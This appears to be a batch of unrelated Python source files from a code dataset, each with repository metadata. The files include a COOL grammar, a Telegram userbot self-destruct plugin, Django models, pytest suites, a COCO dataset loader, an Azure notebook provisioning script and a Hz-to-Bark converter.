class_list %= def_class + class_list, lambda h, s: [s[1]] + s[2]
class_list %= def_class, lambda h, s: [s[1]]
def_class %= (
classx + idx + ocur + feature_list + ccur + semi,
lambda h, s: ClassDeclarationNode(s[2], s[4]),
)
def_class %= (
classx + idx + inherits + idx + ocur + feature_list + ccur + semi,
lambda h, s: ClassDeclarationNode(s[2], s[6], s[4]),
)
feature_list %= def_attr + semi + feature_list, lambda h, s: [s[1]] + s[3]
feature_list %= def_func + semi + feature_list, lambda h, s: [s[1]] + s[3]
feature_list %= G.Epsilon, lambda h, s: []
def_attr %= (
idx + colon + idx + larrow + expr,
lambda h, s: AttrDeclarationNode(s[1], s[3], s[5]),
)
def_attr %= idx + colon + idx, lambda h, s: AttrDeclarationNode(s[1], s[3])
def_func %= (
idx + opar + param_list + cpar + colon + idx + ocur + expr + ccur,
lambda h, s: FuncDeclarationNode(s[1], s[3], s[6], s[8]),
)
param_list %= param + comma + param_list, lambda h, s: [s[1]] + s[3]
param_list %= param, lambda h, s: [s[1]]
param_list %= G.Epsilon, lambda h, s: []
param %= idx + colon + idx, lambda h, s: (s[1], s[3])
expr %= idx + larrow + expr, lambda h, s: AssignNode(s[1], s[3])
expr %= let + identifiers_list + inx + expr, lambda h, s: LetNode(s[2], s[4])
expr %= (
ifx + expr + then + expr + elsex + expr + fi,
lambda h, s: IfNode(s[2], s[4], s[6]),
)
expr %= whilex + expr + loop + expr + pool, lambda h, s: WhileNode(s[2], s[4])
expr %= case + expr + of + case_block + esac, lambda h, s: CaseNode(s[2], s[4])
expr %= notx + expr, lambda h, s: NotNode(s[2])
expr %= comp, lambda h, s: s[1]
identifiers_list %= (
identifier_init + comma + identifiers_list,
lambda h, s: [s[1]] + s[3],
)
identifiers_list %= identifier_init, lambda h, s: [s[1]]
identifier_init %= (
idx + colon + idx + larrow + expr,
lambda h, s: VarDeclarationNode(s[1], s[3], s[5]),
)
identifier_init %= idx + colon + idx, lambda h, s: VarDeclarationNode(s[1], s[3])
case_block %= case_item + case_block, lambda h, s: [s[1]] + s[2]
case_block %= case_item, lambda h, s: [s[1]]
case_item %= (
idx + colon + idx + rarrow + expr + semi,
lambda h, s: CaseItemNode(s[1], s[3], s[5]),
)
comp %= comp + less + arith, lambda h, s: LessNode(s[1], s[3])
comp %= comp + equal + arith, lambda h, s: EqualNode(s[1], s[3])
comp %= comp + lesseq + arith, lambda h, s: LessEqualNode(s[1], s[3])
comp %= arith, lambda h, s: s[1]
arith %= arith + plus + term, lambda h, s: PlusNode(s[1], s[3])
arith %= arith + minus + term, lambda h, s: MinusNode(s[1], s[3])
arith %= term, lambda h, s: s[1]
term %= term + star + factor, lambda h, s: StarNode(s[1], s[3])
term %= term + div + factor, lambda h, s: DivNode(s[1], s[3])
term %= factor, lambda h, s: s[1]
factor %= isvoid + element, lambda h, s: IsvoidNode(s[2])
factor %= neg + element, lambda h, s: NegNode(s[2])
factor %= new + idx, lambda h, s: InstantiateNode(s[2])
factor %= element, lambda h, s: s[1]
element %= opar + expr + cpar, lambda h, s: s[2]
element %= ocur + block + ccur, lambda h, s: BlockNode(s[2])
element %= (element + dot + func_call, lambda h, s: CallNode(*s[3], obj=s[1]))
element %= (
element + at + idx + dot + func_call,
lambda h, s: CallNode(*s[5], obj=s[1], at_type=s[3]),
)
element %= func_call, lambda h, s: CallNode(*s[1])
element %= atom, lambda h, s: s[1]
atom %= num, lambda h, s: ConstantNumNode(s[1])
atom %= idx, lambda h, s: VariableNode(s[1])
atom %= (
true,
lambda h, s: BooleanNode(s[1]),
)
atom %= false, lambda h, s: BooleanNode(s[1])
atom %= string, lambda h, s: StringNode(s[1])
block %= expr + semi, lambda h, s: [s[1]]
block %= expr + semi + block, lambda h, s: [s[1]] + s[3]
func_call %= idx + opar + arg_list + cpar, lambda h, s: (s[1], s[3])
arg_list %= expr + comma + arg_list, lambda h, s: [s[1]] + s[3]
arg_list %= expr, lambda h, s: [s[1]]
arg_list %= G.Epsilon, lambda h, s: []
if print_grammar:
print(G)
return (G, idx, string, num)
| 2.5 | 2 |
userbot/plugins/selfdestruct.py | Aliensuniquebot/CatUserbot | 1 | 5566 | <gh_stars>1-10
# For @UniBorg
# courtesy <NAME>
"""Self Destruct Plugin
.sd <time in seconds> <text>
"""
import time
from userbot import CMD_HELP
from telethon.errors import rpcbaseerrors
from userbot.utils import admin_cmd
import importlib.util
@borg.on(admin_cmd(pattern="sdm", outgoing=True))
async def selfdestruct(destroy):
if not destroy.text[0].isalpha() and destroy.text[0] not in ("/", "#", "@", "!"):
message = destroy.text
counter = int(message[5:7])
text = str(destroy.text[7:])
text = (
text
)
await destroy.delete()
smsg = await destroy.client.send_message(destroy.chat_id, text)
time.sleep(counter)
await smsg.delete()
@borg.on(admin_cmd(pattern="selfd", outgoing=True ))
async def selfdestruct(destroy):
if not destroy.text[0].isalpha() and destroy.text[0] not in ("/", "#", "@", "!"):
message = destroy.text
counter = int(message[7:9])
text = str(destroy.text[9:])
text = (
text
+ "\n\n`This message shall be self-destructed in "
+ str(counter)
+ " seconds`"
)
await destroy.delete()
smsg = await destroy.client.send_message(destroy.chat_id, text)
time.sleep(counter)
await smsg.delete()
CMD_HELP.update({
"selfdestruct":
".sdm number | [text]\
\nUsage: self destruct this message in number seconds \
\n\n.self number | [text]\
\nUsage:self destruct this message in number seconds with showing that it will destruct. \
"
})
| 2.21875 | 2 |
snippets/basic_render_template_class.py | OSAMAMOHAMED1234/python_projects | 0 | 5567 | <reponame>OSAMAMOHAMED1234/python_projects
import os
class Template:
template_name = ''
context = None
def __init__(self, template_name='', context=None, *args, **kwargs):
self.template_name = template_name
self.context = context
def get_template(self):
template_path = os.path.join(os.path.join(os.path.dirname(os.path.abspath(__file__)), 'templates'), self.template_name)
if not os.path.exists(template_path):
raise Exception(f'This path does not exist : {template_path}')
template_string = ''
with open(template_path, 'r') as f:
template_string = f.read()
return template_string
def render(self, context=None):
render_ctx = context
if self.context != None:
render_ctx = self.context
if not isinstance(render_ctx, dict):
render_ctx = {}
template_string = self.get_template()
return template_string.format(**render_ctx)
obj = Template(template_name='test.html', context={'name': 'OSAMA'})
print(obj.render())
obj.context= None
print(obj.render(context={'name': 'os'}))
obj2 = Template(template_name='test.html')
print(obj2.render(context={'name': 'os'})) | 3.078125 | 3 |
level_one/strings.py | jameskzhao/python36 | 0 | 5568 | <reponame>jameskzhao/python36
#Basics
a = "hello"
a += " I'm a dog"
print(a)
print(len(a))
print(a[1:]) #Output: ello I'm a dog
print(a[:5]) #Output: hello(index 5 is not included)
print(a[2:5])#Output: llo(index 2 is included)
print(a[::2])#Step size
#string is immutable so you can't assign a[1]= b
x = a.upper()
print(x)
x = a.capitalize()
print(x)
x = a.split('e')
print(x)
x = a.split() #splits the string by space
print(x)
x = a.strip() #removes any whitespace from beginning or the end
print(x)
x = a.replace('l','xxx')
print(x)
x = "Insert another string here: {}".format('insert me!')
x = "Item One: {} Item Two: {}".format('dog', 'cat')
print(x)
x = "Item One: {m} Item Two: {m}".format(m='dog', n='cat')
print(x)
#command-line string input
print("Enter your name:")
x = input()
print("Hello: {}".format(x)) | 4.09375 | 4 |
tests/test_01_accept_time_get_headers.py | glushkovvv/test_2gis | 0 | 5569 | <filename>tests/test_01_accept_time_get_headers.py
# -*- coding: utf-8 -*-
"""
test_01_accept_time_get_headers
~~~~~~~~~~~~~~
The 2GIS API Test
Check time get headers
:author: <NAME>
:copyright: Copyright 2019, The2GIS API Test"
:license: MIT
:version: 1.0.0
:maintainer: <NAME>
:email: <EMAIL>
:status: Development
"""
import pytest
import allure
from tools.api_responses import get_response
@allure.epic("Поизитивные тесты API")
@allure.suite("Позитивное тестирование время ответов")
@allure.title("Проверка время ответа при нечётком поиске, при фильтрации по коду страны, при постраничной разбивке")
@pytest.mark.parametrize("json_params", [{"page": 1, "page_size": 5},
{"country_code": "ru", "page": 1, "page_size": 5},
{"q": "ОРСК"}])
def test_01_time_response_for_valid_request(setup_option, json_params):
"""
    Check the server response time for valid requests
    :param setup_option: Setup parameters
    :type setup_option: dict
    :param json_params: GET request parameters
:type json_params: dict
:return:
"""
api_url = setup_option['site_url']
request_params = json_params
api_response = get_response(api_url, request_params)
testing_message = (f" EndPoint: {api_response.url}\n"
f" Status: {api_response.status_code}\n"
f" Headers: {api_response.headers}\n"
f" Content: {api_response.content}")
check = api_response.elapsed.total_seconds() <= 0.2
assert check, f"""Время ответа {api_response.elapsed.total_seconds()} больше 0.2 сек\r\n""" + testing_message
@allure.epic("Смок тесты API")
@allure.suite("Позитивное тестирование время ответов")
@allure.title("Проверка время ответа при нечётком поиске, при фильтрации по коду страны, при постраничной разбивке")
@pytest.mark.parametrize("json_params", [{"page": 1, "page_size": 2},
{"country_code": "tz", "page": 1, "page_size": 5},
{"q": "ОР"}])
def test_01_time_response_for_invalid_request(setup_option, json_params):
"""
    Check the server response time for invalid requests
    :param setup_option: Setup parameters
    :type setup_option: dict
    :param json_params: GET request parameters
:type json_params: dict
:return:
"""
api_url = setup_option['site_url']
request_params = json_params
api_response = get_response(api_url, request_params)
testing_message = (f" EndPoint: {api_response.url}\n"
f" Status: {api_response.status_code}\n"
f" Headers: {api_response.headers}\n"
f" Content: {api_response.content}")
check = api_response.elapsed.total_seconds() <= 0.5
assert check, f"""Время ответа {api_response.elapsed.total_seconds()} больше 0.5 сек\r\n""" + testing_message
| 2.0625 | 2 |
transformers/string/strlen_transformer.py | ucds-sg/h2oai | 0 | 5570 | <gh_stars>0
"""Returns the string length of categorical values"""
from h2oaicore.transformer_utils import CustomTransformer
import datatable as dt
import numpy as np
class MyStrLenEncoderTransformer(CustomTransformer):
@staticmethod
def get_default_properties():
return dict(col_type="any", min_cols=1, max_cols=1, relative_importance=1)
def fit_transform(self, X: dt.Frame, y: np.array = None):
return self.transform(X)
def transform(self, X: dt.Frame):
return X.to_pandas().astype(str).iloc[:, 0].str.len()
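# Usage sketch added for illustration (not part of the original recipe); it
# assumes the transformer can be constructed directly outside the Driverless
# AI runtime, and the column name is arbitrary.
def _example_transform():
    X = dt.Frame({"animal": ["cat", "horse", "gecko"]})
    return MyStrLenEncoderTransformer().transform(X) # pandas Series: 3, 5, 5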
| 2.953125 | 3 |
geometry/eolearn/geometry/__init__.py | eerzin/eo-learn | 1 | 5571 | <filename>geometry/eolearn/geometry/__init__.py
"""
Subpackage containing EOTasks for geometrical transformations
"""
from .utilities import ErosionTask, VectorToRaster, RasterToVector
from .sampling import PointSamplingTask, PointSampler, PointRasterSampler
__version__ = '0.4.2'
| 1.210938 | 1 |
api/models/users.py | felipebarraza6/startup_comedy | 0 | 5572 | <reponame>felipebarraza6/startup_comedy
"""User Model."""
# Django
from django.db import models
from django.contrib.auth.models import AbstractUser
# Utilities
from .utils import ApiModel
class User(ApiModel, AbstractUser):
email = models.EmailField(
'email',
unique = True,
)
USERNAME_FIELD = 'email'
REQUIRED_FIELDS = ['username', 'first_name', 'last_name']
is_student = models.BooleanField(default=False)
class Meta:
verbose_name='Usuario'
verbose_name_plural='Usuarios'
def __str__(self):
return self.username
def get_short_name(self):
return self.username
class ProfileUser(ApiModel):
user = models.OneToOneField(User, on_delete=models.CASCADE)
approved_courses = models.ManyToManyField('api.ResultContest',
related_name='user_aproved_courses', blank=True, null=True)
tests_performed = models.ManyToManyField('api.ResultTest',
related_name='user_result_test', blank=True)
class Meta:
verbose_name = 'Usuario - Perfil'
verbose_name_plural = 'Usuarios - Perfiles'
def __str__(self):
return str(self.user)
| 2.5 | 2 |
tests/test_server.py | m-bo-one/ethereumd-proxy | 21 | 5573 | <reponame>m-bo-one/ethereumd-proxy
from collections import namedtuple
import json
from asynctest.mock import patch
import pytest
from ethereumd.server import RPCServer
from ethereumd.proxy import EthereumProxy
from aioethereum.errors import BadResponseError
from .base import BaseTestRunner
Request = namedtuple('Request', ['json'])
class TestServer(BaseTestRunner):
run_with_node = True
async def init_server(self, loop):
server = RPCServer()
with patch('ethereumd.poller.Poller.poll'):
await server.before_server_start()(None, loop)
return server
@pytest.mark.asyncio
async def test_server_handler_index_success_call(self, event_loop):
server = await self.init_server(event_loop)
data = {
'jsonrpc': '2.0',
'method': 'getblockcount',
'params': [],
'id': 'test',
}
request = Request(json=data)
response = await server.handler_index(request)
parsed = json.loads(response.body)
assert parsed['error'] is None
assert isinstance(parsed['result'], int)
@pytest.mark.asyncio
async def test_server_handler_index_invalid_rpc_data(self, event_loop):
server = await self.init_server(event_loop)
data = {
'jsonrpc': '2.0',
'method': 'getblockcount',
'id': 'test',
}
request = Request(json=data)
response = await server.handler_index(request)
parsed = json.loads(response.body)
assert parsed['error']['code'] == -32602
assert parsed['error']['message'] == 'Invalid rpc 2.0 structure'
assert parsed['result'] is None
@pytest.mark.asyncio
async def test_server_handler_index_attr_error_call(self, event_loop):
server = await self.init_server(event_loop)
data = {
'jsonrpc': '2.0',
'method': 'getblockcount',
'params': [],
'id': 'test',
}
request = Request(json=data)
def _raise_error():
raise AttributeError('bla bla method not found')
with patch.object(EthereumProxy, 'getblockcount',
side_effect=_raise_error):
response = await server.handler_index(request)
parsed = json.loads(response.body)
assert parsed['error']['code'] == -32601
assert parsed['error']['message'] == 'Method not found'
assert parsed['result'] is None
@pytest.mark.asyncio
async def test_server_handler_index_type_error_call(self, event_loop):
server = await self.init_server(event_loop)
data = {
'jsonrpc': '2.0',
'method': 'getblockcount',
'params': [],
'id': 'test',
}
request = Request(json=data)
def _raise_error():
raise TypeError('test')
with patch.object(EthereumProxy, 'getblockcount',
side_effect=_raise_error):
response = await server.handler_index(request)
parsed = json.loads(response.body)
assert parsed['error']['code'] == -1
assert parsed['error']['message'] == 'test'
assert parsed['result'] is None
@pytest.mark.asyncio
async def test_server_handler_index_bad_response_call(self, event_loop):
server = await self.init_server(event_loop)
data = {
'jsonrpc': '2.0',
'method': 'getblockcount',
'params': [],
'id': 'test',
}
request = Request(json=data)
def _raise_error():
raise BadResponseError('test', code=-99999999)
with patch.object(EthereumProxy, 'getblockcount',
side_effect=_raise_error):
response = await server.handler_index(request)
parsed = json.loads(response.body)
assert parsed['error']['code'] == -99999999
assert parsed['error']['message'] == 'test'
assert parsed['result'] is None
| 2.078125 | 2 |
neorl/rl/baselines/readme.py | evdcush/neorl | 20 | 5574 | <filename>neorl/rl/baselines/readme.py
# This file is part of NEORL.
# Copyright (c) 2021 Exelon Corporation and MIT Nuclear Science and Engineering
# NEORL is free software: you can redistribute it and/or modify
# it under the terms of the MIT LICENSE
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#NEORL team thanks stable-baselines as we have used their own implementation of different RL
#algorithms to establish NEORL optimizers. We have used the files in this open-source repo:
#https://github.com/hill-a/stable-baselines | 1.296875 | 1 |
Compare.py | sushantPatrikar/WaveCompartor | 3 | 5575 | from scipy.io import wavfile
import numpy as np
import pingouin as pg
import pandas as pd
_,data = wavfile.read('wav//ed//mp3baked.wav')
_,data1 = wavfile.read('wav//ing//ingeating.wav')
i= data.shape[0]-1
j = data1.shape[0]-1
index_1 = -1
index_2 = -1
try:
data.shape[1]
except IndexError:
data = data.reshape(data.shape[0],1)
try:
data1.shape[1]
except IndexError:
data1 = data1.reshape(data1.shape[0],1)
while True:
if data[i,0] !=0 and index_1==-1:
index_1 = i
pass
if data1[j,0] !=0 and index_2==-1:
index_2 = j
pass
if index_1!=-1 and index_2!=-1:
break
i-=1
j-=1
data = data[-index_1:,:]
data1 = data1[-index_2:,:]
data = data[-2000:,:]
data1= data1[-2000:,:]
x =pg.corr(x=data[:,0],y=data1[:,0])
print(x)
# print(data.tostring())
# print(data1.tostring())
# data = data[:,:]
# data1 = data1[:,:]
# data = data.reshape(data.shape[0],1)
# data1 = data1.reshape(data1.shape[0],1)
# data = data[-10000:,:]
# data1 = data1[-10000:,:]
# print(data1.shape[1])
# df = pd.DataFrame(data,data1)
# print(df.head())
# print(data1.shape)
# data = data[-5000:,:]
# data1 = data1[-5000:,:]
# #
# x =pg.corr(x=data[:,0],y=data1[:,0])
# print(x)
| 2.421875 | 2 |
tests/comments/test_only_block_comment.py | sco1/pylox | 2 | 5576 | <reponame>sco1/pylox<filename>tests/comments/test_only_block_comment.py<gh_stars>1-10
from textwrap import dedent
import pytest
from pylox.lox import Lox
TEST_SRC = dedent(
"""\
/*
This is a multiline block comment
*/
"""
)
EXPECTED_STDOUTS: list[str] = []
def test_block_comment_at_eof(capsys: pytest.CaptureFixture) -> None:
interpreter = Lox()
interpreter.run(TEST_SRC)
assert not interpreter.had_error
assert not interpreter.had_runtime_error
all_out = capsys.readouterr().out.splitlines()
assert all_out == EXPECTED_STDOUTS
| 2.46875 | 2 |
mlbase/lazy.py | n-kats/mlbase | 0 | 5577 | <reponame>n-kats/mlbase<filename>mlbase/lazy.py<gh_stars>0
from mlbase.utils.misc import lazy
tensorflow = lazy("tensorflow")
numpy = lazy("numpy")
gensim = lazy("gensim")
| 1.4375 | 1 |
setup.py | sturmianseq/observed | 33 | 5578 | import re
import setuptools
README_FILENAME = "README.md"
VERSION_FILENAME = "observed.py"
VERSION_RE = r"^__version__ = ['\"]([^'\"]*)['\"]"
# Get version information
with open(VERSION_FILENAME, "r") as version_file:
mo = re.search(VERSION_RE, version_file.read(), re.M)
if mo:
version = mo.group(1)
else:
msg = "Unable to find version string in %s." % (version_file,)
raise RuntimeError(msg)
# Get description information
with open(README_FILENAME, "r") as description_file:
long_description = description_file.read()
setuptools.setup(
name="observed",
version=version,
author="<NAME>",
author_email="<EMAIL>",
description="Observer pattern for functions and bound methods",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/DanielSank/observed",
py_modules=["observed"],
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
)
| 1.890625 | 2 |
src/coco.py | catalyst-team/detector | 15 | 5579 | import os
import json
import numpy as np
import pickle
from typing import Any
from pycocotools.coco import COCO
from torch.utils.data import Dataset
class DetectionMSCOCODataset(Dataset):
def __init__(self, annotation_file: str, image_dir: str):
self._annotation_file = annotation_file
self._image_dir = image_dir
self._cache_file = self._annotation_file + ".cache"
self._coco = COCO(self._annotation_file)
self._img_ids = self._coco.getImgIds()
self._cat_ids = self._coco.getCatIds()
self._ann_ids = self._coco.getAnnIds()
self._data = "coco"
self._classes = {
ind: cat_id for ind, cat_id in enumerate(self._cat_ids)
}
self._coco_to_class_map = {
value: key for key, value in self._classes.items()
}
self._load_data()
self._db_inds = np.arange(len(self._image_names))
self._load_coco_data()
def _load_data(self):
print("loading from cache file: {}".format(self._cache_file))
if not os.path.exists(self._cache_file):
print("No cache file found...")
self._extract_data()
with open(self._cache_file, "wb") as f:
pickle.dump([self._detections, self._image_names], f)
print("Cache file created")
else:
with open(self._cache_file, "rb") as f:
self._detections, self._image_names = pickle.load(f)
def _load_coco_data(self):
with open(self._annotation_file, "r") as f:
data = json.load(f)
coco_ids = self._coco.getImgIds()
eval_ids = {
self._coco.loadImgs(coco_id)[0]["file_name"]: coco_id
for coco_id in coco_ids
}
self._coco_categories = data["categories"]
self._coco_eval_ids = eval_ids
def class_name(self, cid):
cat_id = self._classes[cid]
cat = self._coco.loadCats([cat_id])[0]
return cat["name"]
def _extract_data(self):
self._image_names = [
self._coco.loadImgs(img_id)[0]["file_name"]
for img_id in self._img_ids
]
self._detections = {}
for ind, (coco_image_id, image_name) in enumerate(zip(self._img_ids, self._image_names)):
image = self._coco.loadImgs(coco_image_id)[0]
bboxes = []
categories = []
for cat_id in self._cat_ids:
annotation_ids = self._coco.getAnnIds(imgIds=image["id"], catIds=cat_id)
annotations = self._coco.loadAnns(annotation_ids)
category = self._coco_to_class_map[cat_id]
for annotation in annotations:
bbox = np.array(annotation["bbox"])
bbox[[2, 3]] += bbox[[0, 1]]
bboxes.append(bbox)
categories.append(category)
self._detections[image_name] = [{
'bbox': bbox.astype(np.float32),
'category_id': category,
'category_name': self.class_name(category)
} for bbox, category in zip(bboxes, categories)]
def __getitem__(self, ind: int) -> Any:
image_name = self._image_names[ind]
return {
'image_name': os.path.join(self._image_dir, image_name),
'detections': self._detections[image_name]
}
def __len__(self) -> int:
return len(self._img_ids)
def get_num_classes(self) -> int:
return len(self._cat_ids)
| 2.453125 | 2 |
UVa 10105 polynomial coefficients/sample/main.py | tadvi/uva | 1 | 5580 | import sys
import operator
sys.stdin = open('input.txt')
fact = [1, 1]
for i in range(2, 15):
fact.append(fact[-1] * i)
while True:
try:
n, k = map(int, raw_input().split())
coef = map(int, raw_input().split())
except:
break
print fact[n] / reduce(operator.mul, [fact[c] for c in coef])
| 2.84375 | 3 |
pynotes/note/models.py | wallaceleonel/Flash-Cards | 2 | 5581 | <gh_stars>1-10
from django.contrib.auth.models import User
from django.db import models
from django.urls import reverse
# Create your models here.
class Post(models.Model):
title = models.CharField(max_length=255)
slug = models.SlugField(max_length=255,unique=True)
#meusite.com/blog;introducao-ao-django
author = models.ForeignKey(User, on_delete=models.CASCADE)
body = models.TextField()
created = models.DateTimeField(auto_now_add=True)
updated = models.DateTimeField(auto_now=True)
class Meta:
ordering = ("-created",)
def __str__(self):
return self.title
def get_absolute_url(self):
return reverse("note:detail", kwargs={"slug": self.slug})
| 2.53125 | 3 |
infrastructure-provisioning/src/general/scripts/azure/common_notebook_configure_dataengine.py | DmytroLiaskovskyi/incubator-dlab | 0 | 5582 | #!/usr/bin/python
# *****************************************************************************
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
# ******************************************************************************
import logging
import json
import sys
from dlab.fab import *
from dlab.meta_lib import *
from dlab.actions_lib import *
import os
import uuid
if __name__ == "__main__":
local_log_filename = "{}_{}_{}.log".format(os.environ['conf_resource'], os.environ['project_name'],
os.environ['request_id'])
local_log_filepath = "/logs/" + os.environ['conf_resource'] + "/" + local_log_filename
logging.basicConfig(format='%(levelname)-8s [%(asctime)s] %(message)s',
level=logging.DEBUG,
filename=local_log_filepath)
try:
# generating variables dictionary
print('Generating infrastructure names and tags')
notebook_config = dict()
try:
notebook_config['exploratory_name'] = os.environ['exploratory_name'].replace('_', '-')
except:
notebook_config['exploratory_name'] = ''
try:
notebook_config['computational_name'] = os.environ['computational_name'].replace('_', '-')
except:
notebook_config['computational_name'] = ''
notebook_config['service_base_name'] = os.environ['conf_service_base_name']
notebook_config['resource_group_name'] = os.environ['azure_resource_group_name']
notebook_config['region'] = os.environ['azure_region']
notebook_config['user_name'] = os.environ['edge_user_name'].replace('_', '-')
notebook_config['project_name'] = os.environ['project_name'].replace('_', '-')
notebook_config['project_tag'] = os.environ['project_name'].replace('_', '-')
notebook_config['endpoint_tag'] = os.environ['endpoint_name'].replace('_', '-')
notebook_config['cluster_name'] = notebook_config['service_base_name'] + '-' + notebook_config['project_name'] + \
'-de-' + notebook_config['exploratory_name'] + '-' + \
notebook_config['computational_name']
notebook_config['master_node_name'] = notebook_config['cluster_name'] + '-m'
notebook_config['slave_node_name'] = notebook_config['cluster_name'] + '-s'
notebook_config['notebook_name'] = os.environ['notebook_instance_name']
notebook_config['key_path'] = os.environ['conf_key_dir'] + '/' + os.environ['conf_key_name'] + '.pem'
notebook_config['dlab_ssh_user'] = os.environ['conf_os_user']
notebook_config['instance_count'] = int(os.environ['dataengine_instance_count'])
try:
notebook_config['spark_master_ip'] = AzureMeta().get_private_ip_address(
notebook_config['resource_group_name'], notebook_config['master_node_name'])
notebook_config['notebook_ip'] = AzureMeta().get_private_ip_address(
notebook_config['resource_group_name'], notebook_config['notebook_name'])
except Exception as err:
print('Error: {0}'.format(err))
sys.exit(1)
notebook_config['spark_master_url'] = 'spark://{}:7077'.format(notebook_config['spark_master_ip'])
except Exception as err:
for i in range(notebook_config['instance_count'] - 1):
slave_name = notebook_config['slave_node_name'] + '{}'.format(i+1)
AzureActions().remove_instance(notebook_config['resource_group_name'], slave_name)
AzureActions().remove_instance(notebook_config['resource_group_name'], notebook_config['master_node_name'])
append_result("Failed to generate infrastructure names", str(err))
sys.exit(1)
try:
logging.info('[INSTALLING KERNELS INTO SPECIFIED NOTEBOOK]')
print('[INSTALLING KERNELS INTO SPECIFIED NOTEBOOK]')
params = "--cluster_name {0} --spark_version {1} --hadoop_version {2} --os_user {3} --spark_master {4}" \
" --keyfile {5} --notebook_ip {6} --datalake_enabled {7} --spark_master_ip {8}".\
format(notebook_config['cluster_name'], os.environ['notebook_spark_version'],
os.environ['notebook_hadoop_version'], notebook_config['dlab_ssh_user'],
notebook_config['spark_master_url'], notebook_config['key_path'], notebook_config['notebook_ip'],
os.environ['azure_datalake_enable'], notebook_config['spark_master_ip'])
try:
local("~/scripts/{}_{}.py {}".format(os.environ['application'], 'install_dataengine_kernels', params))
except:
traceback.print_exc()
raise Exception
except Exception as err:
print('Error: {0}'.format(err))
for i in range(notebook_config['instance_count'] - 1):
slave_name = notebook_config['slave_node_name'] + '{}'.format(i+1)
AzureActions().remove_instance(notebook_config['resource_group_name'], slave_name)
AzureActions().remove_instance(notebook_config['resource_group_name'], notebook_config['master_node_name'])
append_result("Failed installing Dataengine kernels.", str(err))
sys.exit(1)
try:
logging.info('[UPDATING SPARK CONFIGURATION FILES ON NOTEBOOK]')
print('[UPDATING SPARK CONFIGURATION FILES ON NOTEBOOK]')
params = "--hostname {0} " \
"--keyfile {1} " \
"--os_user {2} " \
"--cluster_name {3} " \
.format(notebook_config['notebook_ip'],
notebook_config['key_path'],
notebook_config['dlab_ssh_user'],
notebook_config['cluster_name'])
try:
local("~/scripts/{0}.py {1}".format('common_configure_spark', params))
except:
traceback.print_exc()
raise Exception
except Exception as err:
print('Error: {0}'.format(err))
for i in range(notebook_config['instance_count'] - 1):
slave_name = notebook_config['slave_node_name'] + '{}'.format(i+1)
AzureActions().remove_instance(notebook_config['resource_group_name'], slave_name)
AzureActions().remove_instance(notebook_config['resource_group_name'], notebook_config['master_node_name'])
append_result("Failed to configure Spark.", str(err))
sys.exit(1)
try:
with open("/root/result.json", 'w') as result:
res = {"notebook_name": notebook_config['notebook_name'],
"Action": "Configure notebook server"}
print(json.dumps(res))
result.write(json.dumps(res))
except:
print("Failed writing results.")
sys.exit(0)
| 1.554688 | 2 |
pyACA/ToolFreq2Bark.py | ruohoruotsi/pyACA | 81 | 5583 | <reponame>ruohoruotsi/pyACA<filename>pyACA/ToolFreq2Bark.py<gh_stars>10-100
# -*- coding: utf-8 -*-
"""
helper function: convert Hz to Bark scale
Args:
fInHz: The frequency to be converted, can be scalar or vector
cModel: The name of the model ('Schroeder' [default], 'Terhardt', 'Zwicker', 'Traunmuller')
Returns:
Bark values of the input dimension
"""
import numpy as np
import math
def ToolFreq2Bark(fInHz, cModel = 'Schroeder'):
def acaSchroeder_scalar(f):
return 7 * math.asinh(f/650)
def acaTerhardt_scalar(f):
return 13.3 * math.atan(0.75 * f/1000)
def acaZwicker_scalar(f):
return 13 * math.atan(0.76 * f/1000) + 3.5 * math.atan(f/7500)
def acaTraunmuller_scalar(f):
return 26.81/(1+1960./f) - 0.53
f = np.asarray(fInHz)
if f.ndim == 0:
if cModel == 'Terhardt':
return acaTerhardt_scalar(f)
elif cModel == 'Zwicker':
return acaZwicker_scalar(f)
elif cModel == 'Traunmuller':
return acaTraunmuller_scalar(f)
else:
return acaSchroeder_scalar(f)
fBark = np.zeros(f.shape)
if cModel == 'Terhardt':
for k,fi in enumerate(f):
fBark[k] = acaTerhardt_scalar(fi)
elif cModel == 'Zwicker':
for k,fi in enumerate(f):
fBark[k] = acaZwicker_scalar(fi)
elif cModel == 'Traunmuller':
for k,fi in enumerate(f):
fBark[k] = acaTraunmuller_scalar(fi)
else:
for k,fi in enumerate(f):
fBark[k] = acaSchroeder_scalar(fi)
return (fBark)
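# Illustrative usage sketch (not part of the original module). It assumes pyACA
# is importable as-is; the frequencies below are arbitrary example values.
if __name__ == "__main__":
    # scalar input -> scalar Bark value (default Schroeder model)
    print(ToolFreq2Bark(1000.))
    # vector input -> array of Bark values, here using the Traunmuller model
    print(ToolFreq2Bark(np.array([100., 1000., 4000.]), cModel='Traunmuller'))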
| 2.578125 | 3 |
magenta/models/sketch_rnn/rnn.py | laurens-in/magenta | 1 | 5584 | <reponame>laurens-in/magenta
# Copyright 2019 The Magenta Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""SketchRNN RNN definition."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
